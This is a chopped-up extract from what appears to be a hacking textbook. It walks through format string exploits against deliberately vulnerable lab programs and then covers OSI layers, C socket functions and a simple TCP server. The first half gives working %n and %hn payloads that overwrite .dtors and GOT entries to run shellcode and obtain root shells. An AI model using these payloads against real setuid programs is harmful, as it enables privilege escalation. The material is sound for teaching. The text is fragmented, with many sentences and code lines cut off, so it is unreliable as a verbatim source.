memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC,
and finally 0xDD
...
The first write
will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc,
and finally 0x000000dd
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $

The last %x format parameter uses 8 as the field width to standardize the output
...
Since the first overwrite puts 28 into test_val,
using 150 as the field width instead of 8 should control the least significant byte of
test_val to 0xAA
...
Another argument is needed for another %xformat
parameter to increment the byte count to 187, which is 0xBB in decimal
...
Since this is all still in the
memory of the format string, it can be easily controlled
...

After that, the next memory address to be written to, 0x08049755, should be put
into memory so the second %n format parameter can access it
...
But all of these bytes
of memory are also printed by the format function, thus incrementing the byte
counter used for the %n format parameter
...

Perhaps we should think about the beginning of the format string ahead of time
...
Each one will need to have a memory address
passed to it, and among them all, four bytes of junk are needed to properly
increment the byte counter for the %n format parameters
...
For the entire write procedure, the
beginning of the format string should look like this:

Figure 0x300-4
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $

The addresses and junk data at the beginning of the format string changed the
value of the necessary field width option for the %x format parameter
...
Another way this
could have been done is to subtract 24 from the previous field width value of 150,
since 6 new 4-byte words have been added to the front of the format string
...

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $
...
A hexadecimal
calculator quickly shows that 17 more bytes need to be written before the next %n
format parameter
...

This process can be repeated for the third and fourth writes
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $

By controlling the least significant byte and performing four writes, an entire
address can be written to any memory address
...

This can be quickly explored by statically declaring another initialized variable
called next_val, right after test_val, and also displaying this value in the debug
output
...

Here, next_val is initialized with the value 0x11111111, so the effect of the write
operations on it will be apparent
...
c > fmt_vuln2
...
c fmt_vuln2
...
c
reader@hacking:~/booksrc $
...
However, next_val is shown to be adjacent to it
...

Last time, a very convenient address of oxdccbbaa was used
...
But what if an address like 0x0806abcd is used? With this address, the first
byte of 0xCD is easy to write using the %n format parameter by outputting 205
bytes total bytes with a field width of 161
...
It's easy to increment the
byte counter for the %n format parameter, but it's impossible to subtract from it
...
/fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $
...
This technique can be used to wrap around
again and set the least significant byte to 0x06 for the third write
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0
4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $
...
The wraparound technique seems to be working fine, but a slight
problem manifests itself as the final byte is attempted
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002
reader@hacking:~/booksrc $

What happened here? The difference between 0x06 and 0x08 is only two, but

eight bytes are output, resulting in the byte 0x0e being written by the %nformat
parameter, instead
...
This
problem can be alleviated by simply wrapping around again; however, it's good to
know the limitations of the field width option
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $

Just like before, the appropriate addresses and junk data are put in the beginning
of the format string, and the least significant byte is controlled for four write
operations to overwrite all four bytes of the variable test_val
...
Also, any additions less than eight may need to be wrapped around
in a similar fashion
...
In the previous
exploits, each of the format parameter arguments had to be stepped through
sequentially
...
In addition, the sequential nature required three 4-byte words of junk to
properly write a full address to an arbitrary memory location
...
For example, %n$d would access the nth
parameter and display it as a decimal number
...
The second format
parameter accesses the fourth parameter and uses a field width option of 05
...
This method of direct access
eliminates the need to step through memory until the beginning of the format
string is located, since this memory can be accessed directly
...

reader@hacking:~/booksrc $
...
/fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

In this example, the beginning of the format string is located at the fourth
parameter argument
...

Since this is being done on the command line and the dollar sign is a special
character, it must be escaped with a backslash
...
The actual
format string can be seen when it is printed correctly
...
Since
memory can be accessed directly, there's no need for four-byte spacers of junk
data to increment the byte output count
...
For practice, let's use direct parameter access to write a
more realistic-looking address of 0xbffffd72 into the variable test_vals
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
Direct parameter access is only
used for the %n parameters, since it really doesn't matter what values are used for
the %x spacers
...

Using Short Writes
Another technique that can simplify format string exploits is using short writes
...
A more complete description of possible format parameters
can be found in the printf manual page
...

The length modifier
Here, integer conversion stands for d, i, o, u, x, or X conversion
...

This can be used with format string exploits to write two-byte shorts
...
Naturally, direct parameter access can still be used
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff 0015

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
reader@hacking:~/booksrc $

Using short writes, an entire four-byte value can be overwritten with just two %hn
parameters
...

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $
...
Using short
writes, the order of the writes doesn't matter, so the first write can be 0xfd72 and
the second 0xbfff, if the two passed addresses are swapped in position
...

(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $
...
One option is to overwrite the return address
in the most recent stack frame, as was done with the stack-based overflows
...
The nature of stack-based overflows only allows the overwrite
of the return address, but format strings provide the ability to overwrite any
memory address, which creates other possibilities
...
dtors
In binary programs compiled with the GNU C compiler, special table sections
called
...
ctors are made for destructors and constructors,
respectively
...
The destructor functions and the
...

A function can be declared as a destructor function by defining the destructor
attribute, as seen in dtors_sample
...

dtors_sample
...
h>
#include ...
\n");
printf("and then when main() exits, the destructor is called
...
\n");
}

In the preceding code sample, the cleanup() function is defined with the
destructor attribute, so the function is automatically called when the main()
function exits, as shown next
...
c
reader@hacking:~/booksrc $
...

and then when main() exits, the destructor is called
...

reader@hacking:~/booksrc $

This behavior of automatically executing a function on exit is controlled by the

...
This section is an array of 32-bit addresses

terminated by a NULL address
...
Between these two are the addresses
of all the functions that have been declared with the destructor attribute
...

reader@hacking:~/booksrc $ nm
...
get_pc_thunk
...
0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
080483e8 t cleanup

080496b0 b completed
...
0
08048380 t frame_dummy
080483b4 T main
080496ac d p
...
0
reader@hacking:~/booksrc $

The nm command shows that the cleanup() function is located at 0x080483e8
(shown in bold above)
...
dtors section starts at 0x080495ac
with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__( )
...

The objdump command shows the actual contents of the
...
The first value of 80495ac is
simply showing the address where the
...
Then the actual
bytes are shown, opposed to DWORDs, which means the bytes are reversed
...

reader@hacking:~/booksrc $ objdump -s -j
...
/dtors_sample

...
dtors:
80495ac ffffffff e8830408 00000000
...
dtors section is that it is writable
...
dtors section isn't
labeled READONLY
...
/dtors_sample

...
interp 00000013 08048114 08048114 00000114 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1
...
ABI-tag 00000020 08048128 08048128 00000128 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2
...
dynsym 00000060 08048174 08048174 00000174 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4
...
gnu
...
gnu
...
rel
...
rel
...
init 00000017 0804827c 0804827c 0000027c 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
10
...
text 000001c0 080482f0 080482f0 000002f0 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
12
...
rodata 000000bf 080484e0 080484e0 000004e0 2**5
CONTENTS, ALLOC, LOAD, READONLY, DATA
14
...
ctors 00000008 080495a4 080495a4 000005a4 2**2
CONTENTS, ALLOC, LOAD, DATA
16
...
jcr 00000004 080495b8 080495b8 000005b8 2**2

CONTENTS, ALLOC, LOAD, DATA
18
...
got 00000004 08049684 08049684 00000684 2**2
CONTENTS, ALLOC, LOAD, DATA
20
...
plt 0000001c 08049688 08049688 00000688 2**2
CONTENTS, ALLOC, LOAD, DATA
21
...
bss 00000004 080496b0 080496b0 000006b0 2**2
ALLOC
23
...
debug_aranges 00000058 00000000 00000000 000007e0 2**3
CONTENTS, READONLY, DEBUGGING
25
...
debug_info 000001ad 00000000 00000000 0000085d 2**0
CONTENTS, READONLY, DEBUGGING
27
...
debug_line 0000013d 00000000 00000000 00000a70 2**0
CONTENTS, READONLY, DEBUGGING
29
...
debug_ranges 00000048 00000000 00000000 00000c68 2**3
CONTENTS, READONLY, DEBUGGING
reader@hacking:~/booksrc $

Another interesting detail about the
...
This means that the vulnerable
format string program, fmt_vuln
...
dtors section containing
nothing
...

reader@hacking:~/booksrc $ nm
...
dtors
...
/fmt_vuln: file format elf32-i386
Contents of section
...

reader@hacking:~/booksrc $

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is
only four bytes this time, which means there are no addresses between them
...

Since the
...
This will be the address of
__DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the
address of __DTOR_END__ in this case)
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
Since the program name lengths of the helper program
getenvaddr
...
c program differ by two bytes, the
shellcode will be located at 0xbffff9ec when fmt_vuln
...
This address
simply has to be written into the
...
In the output below the short write
method is used
...
/fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $
...
2# whoami
root
sh-3
...
dtors section isn't properly terminated with a NULL address of
0x00000000, the shellcode address is still considered to be a destructor function
...

Another notesearch Vulnerability
In addition to the buffer overflow vulnerability, the notesearch program from
Chapter 0x200 also suffers from a format string vulnerability
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0
...

note_buffer[note_length] = 0; // Terminate the string
...

return 1;
}

This function reads the note_buffer from the file and prints the contents of the
note without supplying its own format string
...
In the following output, the notetaker
program is used to create notes to probe memory in the notesearch program
...

reader@hacking:~/booksrc $
...
"x10')
[DEBUG] buffer @ 0x804a008: 'AAAA%x
...
%x
...
%x
...
%x
...
%x
...
'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750
...
20435455
...
0
...
1
...
252e7825
...

-------[ end of note data ]------reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
dtors section with the address of injected shellcode
...
bin)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm
...
/notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\
x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999

21
-------[ end of note data ]------sh-3
...
2#

Overwriting the Global Offset Table
Since a program could use a function in a shared library many times, it's useful to
have a table to reference all the functions
...

This section consists of many jump instructions, each one corresponding to the
address of a function
...

An object dump disassembling the PLT section in the vulnerable format string
program (fmt_vuln
...
plt
...
/fmt_vuln: file format elf32-i386
Disassembly of section
...

080482c8 <__gmon_start__@plt>:
80482c8: ff 25 74 97 04 08 jmp *0x8049774
80482ce: 68 00 00 00 00 push $0x0
80482d3: e9 e0 ff ff ff jmp 80482b8 <_init+0x18>
080482d8 <__libc_start_main@plt>:
80482d8: ff 25 78 97 04 08 jmp *0x8049778
80482de: 68 08 00 00 00 push $0x8
80482e3: e9 d0 ff ff ff jmp 80482b8 <_init+0x18>

080482e8 :
80482e8: ff 25 7c 97 04 08 jmp *0x804977c
80482ee: 68 10 00 00 00 push $0x10
80482f3: e9 c0 ff ff ff jmp 80482b8 <_init+0x18>
080482f8 :
80482f8: ff 25 80 97 04 08 jmp *0x8049780
80482fe: 68 18 00 00 00 push $0x18
8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 :
8048308: ff 25 84 97 04 08 jmp *0x8049784
804830e: 68 20 00 00 00 push $0x20
8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
reader@hacking:~/booksrc $

One of these jump instructions is associated with the exit() function, which is
called at the end of the program
...
Below, the procedure linking
table is shown to be read only
...
/fmt_vuln | grep -A1 "\
...
plt 00000060 080482b8 080482b8 000002b8 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE

But closer examination of the jump instructions (shown in bold below) reveals that
they aren't jumping to addresses but to pointers to addresses
...

080482f8 :
80482f8: ff 25 80 97 04 08 jmp *0x8049780
80482fe: 68 18 00 00 00 push $0x18
8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 :
8048308: ff 25 84 97 04 08 jmp *0x8049784
804830e: 68 20 00 00 00 push $0x20
8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>

These addresses exist in another section, called the global offset table (GOT), which is
writable
...

reader@hacking:~/booksrc $ objdump -R
...
/fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit

reader@hacking:~/booksrc $

This reveals that the address of the exit() function (shown in bold above) is
located in the GOT at 0x08049784
...

As usual, the shellcode is put in an environment variable, its actual location is
predicted, and the format string vulnerability is used to write the value
...

The calculations for the %x format parameters will be done once again for clarity
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
/fmt_vuln

...
/fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3
...
2#

When fmt_vuln
...
Since the actual
address has been switched with the address for the shellcode in the environment,
a root shell is spawned
...

The ability to overwrite any arbitrary address opens up many possibilities for
exploitation
...

Chapter 0x400
...
By using a common language, humans are able to transfer knowledge,
coordinate actions, and share experiences
...
The real utility of a web browser isn't in the program itself, but in
its ability to communicate with webservers
...
Many
applications such as email, the Web, and instant messaging rely on networking
...

Many people don't realize that there are vulnerabilities in the networking
protocols themselves
...

OSI Model
When two computers talk to each other, they need to speak the same language
...
The OSI
model provides standards that allow hardware, such as routers and firewalls, to
focus on one particular aspect of communication that applies to them and ignore
others
...

This way, routing and firewall hardware can focus on passing data at the lower
layers, ignoring the higher layers of data encapsulation used by running
applications
...
Th
is the lowest layer, whose primary role is communicating raw bit streams
...

Data-link layer This layer deals with actually transferring data between two points
In contrast with the physical layer, which takes care of sending the raw bits, this
layer provides high-level functions, such as error correction and flow control
...

Network layer This layer works as a middle ground; its primary role is to pass
information between the lower and the higher layers
...

Transport layer This layer provides transparent transfer of data between systems
...

Session layer This layer is responsible for establishing and maintaining connections
between network applications
...
This allows for things like encryption and
data compression
...

When data is communicated through these protocol layers, it's sent in small
pieces called packets
...
Starting from the application layer, the packet wraps the pre-sentation
layer around that data, which wraps the session layer, which wraps the transport
layer, and so forth
...
Each wrapped layer
contains a header and a body
...
The body of
one layer contains the entire package of previously encapsulated layers, like the
skin of an onion or the functional contexts found on a program's stack
...
The next later is the data link layer
...
This protocol allows for
communication between Ethernet ports, but these ports don't yet have IP
addresses
...
In addition to addressing, this layer is responsible for moving data
from one address to another
...
The next layer is the transport
layer, which for web traffic is TCP; it provides a seamless bidirectional socket
connection
...
Other addressing schemes exist at this layer; however, your
web traffic probably uses IP version 4 (IPv4)
...
XX
...
XX
...
Since IPv4 is most common, IP will always refer to IPv4 in this
book
...
When you browse the Web, the web
browser on your network is communicating across the Internet with the
webserver located on a different private network
...
Since the router isn't concerned with what's actually in the packets, it only
needs to implement protocols up to the network layer
...
This
router then encapsulates this packet with the lowerlayer protocol headers needed
for the packet to reach its final destination
...

Figure 0x400-1
...
These
protocols are programmed into routers, firewalls, and your computer's operating
system so they can communicate
...
Since the operating system takes care of
the details of network encapsulation, writing network programs is just a matter of
using the network interface of the OS
...
A
socket can be thought of as an endpoint to a connection, like a socket on an
operator's switchboard
...
To
the programmer, a socket can be used to send or receive data over a network
...
There are several different
types of sockets that determine the structure of the transport layer (4)
...

Stream sockets provide reliable two-way communication similar to when you call
someone on the phone
...
In
addition, there is immediate confirmation that what you said actually reached its
destination
...
On computer networks, data is usually transmitted in chunks called
packets
...
Webservers, mail servers, and their
respective client applications all use TCP and stream sockets to communicate
...
Communicating with a
datagram socket is more like mailing a letter than making a phone call
...
If you mail several letters, you can't be
sure that they arrived in the same order, or even that they reached their
destination at all
...
Datagram sockets use another standard protocol called UDP instead of TCP
on the transport layer (4)
...
This protocol is very basic and
lightweight, with few safeguards built into it
...
With datagram sockets,
there is very little overhead in the protocol, but the protocol doesn't do much
...
In some cases
packet loss is acceptable
...

Socket Functions

In C, sockets behave a lot like files since they use file descriptors to identify
themselves
...

However, there are several functions specifically designed for dealing with
sockets
...
h
...

connect(int fd, struct sockaddr *remote_host, socklen_t addr_length)

Connects a socket (described by file descriptor fd) to a remote host
...

bind(int fd, struct sockaddr *local_addr, socklen_t addr_length)

Binds a socket to a local address so it can listen for incoming connections
...

listen(int fd, int backlog_queue_size)

Listens for incoming connections and queues connection requests up to
backlog_queue_size
...

accept(int fd, sockaddr *remote_host, socklen_t *addr_length)

Accepts an incoming connection on a bound socket
...
This function
returns a new socket file descriptor to identify the connected socket or -1 on
error
...

recv(int fd, void *buffer, size_t n, int flags)

Receives n bytes from socket fd into *buffer; returns the number of bytes
received or -1 on error
...
The domain refers to the protocol family
of the socket
...
25 (when you are being a gigantic nerd)
...
h, which is automatically included from
sys/socket
...

From /usr/include/bits/socket
...
*/
#define PF_UNSPEC 0 /* Unspecified
...
*/
#define PF_UNIX PF_LOCAL /* Old BSD name for PF_LOCAL
...
*/
#define PF_INET 2 /* IP protocol family
...
25
...
*/
#define PF_APPLETALK 5 /* Appletalk DDP
...
*/
#define PF_BRIDGE 7 /* Multiprotocol bridge
...
*/
#define PF_X25 9 /* Reserved for X
...
*/
#define PF_INET6 10 /* IP version 6
...

As mentioned before, there are several types of sockets, although stream sockets
and datagram sockets are the most commonly used
...
h
...
)

From /usr/include/bits/socket
...
*/
enum __socket_type
{
SOCK_STREAM = 1, /* Sequenced, reliable, connection-based byte streams
...
*/
#define SOCK_DGRAM SOCK_DGRAM

...
The specification allows for multiple protocols within a protocol
family, so this argument is used to select one of the protocols from the family
...
This is the case for everything we will do with sockets in this book, so
this argument will always be 0 in our examples
...
This structure is also defined in bits/socket
...

From /usr/include/bits/socket
...
*/
#include ...
*/

struct sockaddr
{
__SOCKADDR_COMMON (sa_); /* Common data: address family and length
...
*/
};

The macro for SOCKADDR_COMMON is defined in the included bits/sockaddr
...
This value defines the address
family of the address, and the rest of the structure is saved for address data
...
The possible address families
are also defined in bits/socket
...

From /usr/include/bits/socket
...
*/
#define AF_UNSPEC PF_UNSPEC
#define AF_LOCAL PF_LOCAL
#define AF_UNIX PF_UNIX
#define AF_FILE PF_FILE
#define AF_INET PF_INET
#define AF_AX25 PF_AX25
#define AF_IPX PF_IPX
#define AF_APPLETALK PF_APPLETALK
#define AF_NETROM PF_NETROM
#define AF_BRIDGE PF_BRIDGE
#define AF_ATMPVC PF_ATMPVC
#define AF_X25 PF_X25
#define AF_INET6 PF_INET6

...
These structures are also the same size,
so they can be typecast to and from each other
...
25
...

In this book we are going to deal with Internet Protocol version 4, which is the
protocol family PF_INET, using the address family AF_INET
...
h file
...
h
/* Structure describing an Internet socket address
...
*/

struct in_addr sin_addr; /* Internet address
...
*/
unsigned char sin_zero[sizeof (struct sockaddr) __SOCKADDR_COMMON_SIZE sizeof (in_port_t) sizeof (struct in_addr)];
};

The SOCKADDR_COMMON part at the top of the structure is simply the unsigned short
int mentioned above, which is used to define the address family
...
The port number is a 16-bit short, while the
in_addr structure used for the Internet address contains a 32-bit number
...
This space isn't used for anything, but must be saved so the structures
can be interchangeably typecast
...

Network Byte Order
The port number and IP address used in the AF_INET socket address structure are
expected to follow the network byte ordering, which is big-endian
...

There are several functions specifically for these conversions, whose prototypes
are defined in the netinet/in
...
h include files
...

Internet Address Conversion
When you see 12
...
110
...
This familiar dotted-number notation is a common way to specify
Internet addresses, and there are functions to convert this notation to and from a
32-bit integer in network byte order
...
h include file, and the two most useful conversion functions are:
inet_aton(char *ascii_addr, struct in_addr *network_addr)

ASCII to Network
This function converts an ASCII string containing an IP address in
dottednumber format into an in_addr structure, which, as you remember, only
contains a 32-bit integer representing the IP address in network byte order
...
It is passed a pointer to an in_addr
structure containing an IP address, and the function returns a character
pointer to an ASCII string containing the IP address in dotted-number format
...

A Simple Server Example
The best way to show how these functions are used is by example
...
When a client connects, it
sends the message Hello, world! and then receives data until the connection is
closed
...
A
useful memory dump function has been added to hacking
...

Added to hacking
...

if(((i%16)==15) || (i==length-1)) {
for(j=0; j < 15-(i%16); j++)
printf(" ");
printf("| ");
for(j=(i-(i%16)); j <= i; j++) { // Display printable bytes from line
...
");
}
printf("\n"); // End of the dump line (each line is 16 bytes)
} // End if
} // End for
}

This function is used to display packet data by the server program
...
h, instead
...

simple_server
...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#define PORT 7890 // The port users will be connecting to
int main(void) {
int sockfd, new_sockfd; // Listen on sock_fd, new connection on new_fd
struct sockaddr_in host_addr, client_addr; // My address information
socklen_t sin_size;
int recv_length=1, yes=1;
char buffer[1024];
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
fatal("setting socket option SO_REUSEADDR");

So far, the program sets up a socket using the socket() function
...
The final protocol argument is 0, since there is
only one protocol in the PF_INET protocol family
...

The setsockopt() function is simply used to set socket options
...
Without this option set, when the program tries to bind to a
given port, it will fail if that port is already in use
...

The first argument to this function is the socket (referenced by a file descriptor),
the second specifies the level of the option, and the third specifies the option
itself
...

There are many different socket options defined in /usr/include/ asm/socket
...
The
final two arguments are a pointer to the data that the option should be set to and
the length of that data
...
This allows the functions to
handle all sorts of data, from single bytes to large data structures
...

host_addr
...
sin_port = htons(PORT); // Short, network byte order
host_addr
...
s_addr = 0; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
The
address family is AF_INET, since we are using IPv4 and the sockaddr_instructure
...
This short integer value must be
converted into network byte order, so the htons() function is used
...
Since the value 0 is the same regardless of byte order, no conversion is
necessary
...
This call will bind the socket to the current IP
address on port 7890
...
The listen()
function places all incoming connections into a backlog queue until an accept()
call accepts the connections
...

while(1) { // Accept loop
...
sin_addr), ntohs(client_addr
...
The accept() function's first
two arguments should make sense immediately; the final argument is a pointer to
the size of the address structure
...
For our purposes, the size never changes,
but to use the function we must obey the calling convention
...
This
way, the original socket file descriptor can continue to be used for accepting new
connections, while the new socket file descriptor is used for communicating with
the connected client
...

The send() function sends the 13 bytes of the string Hello, world!\n to the new
socket that describes the new connection
...

Next is a loop that receives data from the connection and prints it out
...
The function writes the data into the buffer passed to it and returns the
number of bytes it actually wrote
...

When compiled and run, the program binds to port 7890 of the host and waits for
incoming connections:
reader@hacking:~/booksrc $ gcc simple_server
...
/a
...

From a Remote Machine
matrix@euclid:~ $ telnet 192
...
42
...
168
...
248
...
168
...
248
...

Hello, world!
this is a test
fjsghau;ehg;ihskjfhasdkfjhaskjvhfdkjhvbkjgf

Upon connection, the server sends the string Hello, world!, and the rest is the
local character echo of me typing this is a test and a line of keyboard
mashing
...
Back on the server side, the output shows the
connection and the packets of data that are sent back
...
/a
...
168
...
1 port 56971
RECV: 16 bytes
74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | This is a test
...

A Web Client Example
The telnet program works well as a client for our server, so there really isn't much
reason to write a specialized client
...
Every time you use a
web browser, it makes a connection to a webserver somewhere
...
By default, webservers run on port 80,
which is listed along with many other default ports in /etc/services
...
At this
layer, all of the networking details have already been taken care of by the lower
layers, so HTTP uses plaintext for its structure
...
Since these are standard protocols, they are all well documented and
easily researched
...
There's no need
to be fluent, but knowing a few important phrases will help you when traveling to
foreign servers
...
For example,
GET / HTTP/1
...
0
...
html
...
If the command HEAD is used instead
of GET, it will only return the HTTP headers without the content
...
These headers
can be retrieved manually using telnet by connecting to port 80 of a known
website, then typing HEAD / HTTP/1
...
In the output
below, telnet is used to open a TCP-IP connection to the webserver at
http://www
...
net
...

reader@hacking:~/booksrc $ telnet www
...
net 80
Trying 208
...
188
...

Connected to www
...
net
...

HEAD / HTTP/1
...
1 200 OK
Date: Fri, 14 Sep 2007 05:34:14 GMT
Server: Apache/2
...
